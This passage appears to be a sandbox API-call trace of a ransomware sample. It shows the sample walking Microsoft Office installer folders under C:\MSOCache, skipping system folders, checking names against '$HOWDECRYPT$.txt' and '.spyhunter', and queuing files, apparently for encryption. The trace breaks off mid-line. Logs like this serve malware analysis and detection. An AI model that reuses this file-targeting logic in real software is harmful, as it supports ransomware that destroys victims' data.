[0081.382] lstrcmpW (lpString1="OutlkLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.382] lstrcmpW (lpString1="OutlkLR.cab", lpString2="_uninstalling_.png") returned 1 [0081.382] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0081.382] GetProcessHeap () returned 0x2c0000 [0081.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x321e70 [0081.382] GetProcessHeap () returned 0x2c0000 [0081.382] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x322240, Size=0x300) returned 0x322240 [0081.382] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.382] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="Windows") returned -1 [0081.382] lstrlenW (lpString="Windows") returned 7 [0081.382] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="$Recycle.bin") returned 1 [0081.382] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.382] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="System Volume Information") returned -1 [0081.382] lstrlenW (lpString="System Volume Information") returned 25 [0081.382] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0081.383] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".spyhunter") returned 0x0 [0081.383] lstrcmpW (lpString1="OutlookMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.383] lstrcmpW (lpString1="OutlookMUI.msi", lpString2="_uninstalling_.png") returned 1 [0081.383] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0081.383] GetProcessHeap () returned 0x2c0000 [0081.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x321f58 [0081.383] GetProcessHeap () returned 0x2c0000 [0081.383] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x322240, Size=0x308) returned 0x322240 [0081.383] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.383] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="Windows") returned -1 [0081.383] lstrlenW (lpString="Windows") returned 7 [0081.383] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="$Recycle.bin") returned 1 [0081.383] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.383] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="System Volume Information") returned -1 [0081.383] lstrlenW (lpString="System Volume Information") returned 25 [0081.383] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0081.383] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".spyhunter") returned 0x0 [0081.383] lstrcmpW (lpString1="OutlookMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.383] lstrcmpW (lpString1="OutlookMUI.xml", lpString2="_uninstalling_.png") returned 1 [0081.383] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0081.383] GetProcessHeap () returned 0x2c0000 [0081.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x322048 [0081.383] GetProcessHeap () returned 0x2c0000 [0081.383] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x322240, Size=0x310) returned 0x322240 [0081.383] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.383] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0081.383] lstrlenW (lpString="Windows") returned 7 [0081.383] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0081.384] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.384] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0081.384] lstrlenW (lpString="System Volume Information") returned 25 [0081.384] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.384] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0081.384] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.384] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0081.384] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.384] GetProcessHeap () returned 0x2c0000 [0081.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x322558 [0081.384] GetProcessHeap () returned 0x2c0000 [0081.384] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x322240, Size=0x318) returned 0x322640 [0081.384] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0081.384] FindClose (in: hFindFile=0x30b530 | out: hFindFile=0x30b530) returned 1 [0081.385] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.385] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.385] GetProcessHeap () returned 0x2c0000 [0081.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x322240 [0081.385] GetProcessHeap () returned 0x2c0000 [0081.385] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x322640, Size=0x320) returned 0x322640 [0081.385] GetProcessHeap () returned 0x2c0000 [0081.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0081.385] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0081.385] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0081.385] lstrlenW (lpString="Windows") returned 7 [0081.385] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0081.385] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.385] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0081.385] lstrlenW (lpString="System Volume Information") returned 25 [0081.385] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned 66 [0081.386] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0081.386] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0081.386] GetProcessHeap () returned 0x2c0000 [0081.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0081.386] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*") returned 68 [0081.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x30b530 [0081.393] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.394] lstrlenW (lpString="Windows") returned 7 [0081.394] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.394] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.394] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.394] lstrlenW (lpString="System Volume Information") returned 25 [0081.394] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.394] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.394] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0081.394] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.394] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0081.394] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.394] GetProcessHeap () returned 0x2c0000 [0081.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x322330 [0081.394] GetProcessHeap () returned 0x2c0000 [0081.394] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x322640, Size=0x328) returned 0x322640 [0081.394] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.395] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.395] lstrlenW (lpString="Windows") returned 7 [0081.395] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.395] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.395] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.395] lstrlenW (lpString="System Volume Information") returned 25 [0081.395] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.395] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.395] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.395] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0081.395] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.395] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0081.395] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.395] GetProcessHeap () returned 0x2c0000 [0081.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x322988 [0081.396] GetProcessHeap () returned 0x2c0000 [0081.396] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x322640, Size=0x330) returned 0x324970 [0081.396] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.396] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0081.396] lstrlenW (lpString="Windows") returned 7 [0081.396] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0081.396] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.396] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0081.396] lstrlenW (lpString="System Volume Information") returned 25 [0081.396] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.396] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0081.396] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.396] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0081.396] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.396] GetProcessHeap () returned 0x2c0000 [0081.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x322408 [0081.397] GetProcessHeap () returned 0x2c0000 [0081.397] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x324970, Size=0x338) returned 0x324970 [0081.397] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="Windows") returned 1 [0081.397] lstrlenW (lpString="Windows") returned 7 [0081.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="$Recycle.bin") returned 1 [0081.397] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="System Volume Information") returned 1 [0081.397] lstrlenW (lpString="System Volume Information") returned 25 [0081.397] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0081.397] StrStrIW (lpFirst="WordLR.cab", lpSrch=".spyhunter") returned 0x0 [0081.397] lstrcmpW (lpString1="WordLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.397] lstrcmpW (lpString1="WordLR.cab", lpString2="_uninstalling_.png") returned 1 [0081.397] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0081.397] GetProcessHeap () returned 0x2c0000 [0081.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x322640 [0081.397] GetProcessHeap () returned 0x2c0000 [0081.397] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x324970, Size=0x340) returned 0x324970 [0081.397] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2="Windows") returned 1 [0081.397] lstrlenW (lpString="Windows") returned 7 [0081.398] lstrcmpiW (lpString1="WordMUI.msi", lpString2="$Recycle.bin") returned 1 [0081.398] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.398] lstrcmpiW (lpString1="WordMUI.msi", lpString2="System Volume Information") returned 1 [0081.398] lstrlenW (lpString="System Volume Information") returned 25 [0081.398] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0081.398] StrStrIW (lpFirst="WordMUI.msi", lpSrch=".spyhunter") returned 0x0 [0081.398] lstrcmpW (lpString1="WordMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.398] lstrcmpW (lpString1="WordMUI.msi", lpString2="_uninstalling_.png") returned 1 [0081.398] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0081.398] GetProcessHeap () returned 0x2c0000 [0081.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x322728 [0081.398] GetProcessHeap () returned 0x2c0000 [0081.398] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x324970, Size=0x348) returned 0x324970 [0081.398] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="Windows") returned 1 [0081.398] lstrlenW (lpString="Windows") returned 7 [0081.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="$Recycle.bin") returned 1 [0081.398] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="System Volume Information") returned 1 [0081.398] lstrlenW (lpString="System Volume Information") returned 25 [0081.398] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0081.399] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".spyhunter") returned 0x0 [0081.399] lstrcmpW (lpString1="WordMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.399] lstrcmpW (lpString1="WordMUI.xml", lpString2="_uninstalling_.png") returned 1 [0081.399] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0081.399] GetProcessHeap () returned 0x2c0000 [0081.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x322810 [0081.399] GetProcessHeap () returned 0x2c0000 [0081.399] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x324970, Size=0x350) returned 0x324970 [0081.399] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0081.399] FindClose (in: hFindFile=0x30b530 | out: hFindFile=0x30b530) returned 1 [0081.399] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.399] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.399] GetProcessHeap () returned 0x2c0000 [0081.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x324cc8 [0081.399] GetProcessHeap () returned 0x2c0000 [0081.399] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x324970, Size=0x358) returned 0x320010 [0081.399] GetProcessHeap () returned 0x2c0000 [0081.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0081.399] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0081.399] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0081.399] lstrlenW (lpString="Windows") returned 7 [0081.399] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0081.399] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.399] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0081.400] lstrlenW (lpString="System Volume Information") returned 25 [0081.400] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned 66 [0081.400] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0081.400] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0081.400] GetProcessHeap () returned 0x2c0000 [0081.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0081.400] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*") returned 68 [0081.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x30b530 [0081.452] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.452] lstrlenW (lpString="Windows") returned 7 [0081.452] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.452] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.452] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.453] lstrlenW (lpString="System Volume Information") returned 25 [0081.453] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.453] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.453] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0081.453] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.453] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0081.453] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.453] GetProcessHeap () returned 0x2c0000 [0081.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x322a60 [0081.453] GetProcessHeap () returned 0x2c0000 [0081.453] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x320010, Size=0x360) returned 0x320010 [0081.453] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.454] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.454] lstrlenW (lpString="Windows") returned 7 [0081.454] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.454] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.454] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.454] lstrlenW (lpString="System Volume Information") returned 25 [0081.454] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.454] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.454] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.454] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0081.454] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.454] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0081.454] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.454] GetProcessHeap () returned 0x2c0000 [0081.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x322b38 [0081.454] GetProcessHeap () returned 0x2c0000 [0081.454] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x320010, Size=0x368) returned 0x320010 [0081.454] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.455] lstrcmpiW (lpString1="Proof.en", lpString2="Windows") returned -1 [0081.455] lstrlenW (lpString="Windows") returned 7 [0081.455] lstrcmpiW (lpString1="Proof.en", lpString2="$Recycle.bin") returned 1 [0081.455] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.455] lstrcmpiW (lpString1="Proof.en", lpString2="System Volume Information") returned -1 [0081.455] lstrlenW (lpString="System Volume Information") returned 25 [0081.455] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned 75 [0081.455] lstrcmpW (lpString1="Proof.en", lpString2=".") returned 1 [0081.455] lstrcmpW (lpString1="Proof.en", lpString2="..") returned 1 [0081.455] GetProcessHeap () returned 0x2c0000 [0081.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x325dc0 [0081.456] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*") returned 77 [0081.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335e20 [0081.456] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.456] lstrlenW (lpString="Windows") returned 7 [0081.456] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.456] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.456] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.456] lstrlenW (lpString="System Volume Information") returned 25 [0081.457] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\.") returned 77 [0081.457] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.457] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.457] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.457] lstrlenW (lpString="Windows") returned 7 [0081.457] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.457] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.457] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.457] lstrlenW (lpString="System Volume Information") returned 25 [0081.457] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\..") returned 78 [0081.457] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.457] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.457] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.457] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0081.457] lstrlenW (lpString="Windows") returned 7 [0081.458] lstrcmpiW (lpString1="Proof.cab", lpString2="$Recycle.bin") returned 1 [0081.458] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.458] lstrcmpiW (lpString1="Proof.cab", lpString2="System Volume Information") returned -1 [0081.458] lstrlenW (lpString="System Volume Information") returned 25 [0081.458] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0081.458] StrStrIW (lpFirst="Proof.cab", lpSrch=".spyhunter") returned 0x0 [0081.458] lstrcmpW (lpString1="Proof.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.458] lstrcmpW (lpString1="Proof.cab", lpString2="_uninstalling_.png") returned 1 [0081.458] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0081.458] GetProcessHeap () returned 0x2c0000 [0081.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x337e10 [0081.458] GetProcessHeap () returned 0x2c0000 [0081.458] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x320010, Size=0x370) returned 0x320010 [0081.458] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0081.458] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0081.458] lstrlenW (lpString="Windows") returned 7 [0081.458] lstrcmpiW (lpString1="Proof.msi", lpString2="$Recycle.bin") returned 1 [0081.458] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.458] lstrcmpiW (lpString1="Proof.msi", lpString2="System Volume Information") returned -1 [0081.458] lstrlenW (lpString="System Volume Information") returned 25 [0081.458] wnsprintfW (in: pszDest=0x325dc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0081.458] StrStrIW (lpFirst="Proof.msi", lpSrch=".spyhunter") returned 0x0 [0081.458] lstrcmpW (lpString1="Proof.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.459] lstrcmpW (lpString1="Proof.msi", lpString2="_uninstalling_.png") returned 1 [0081.459] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 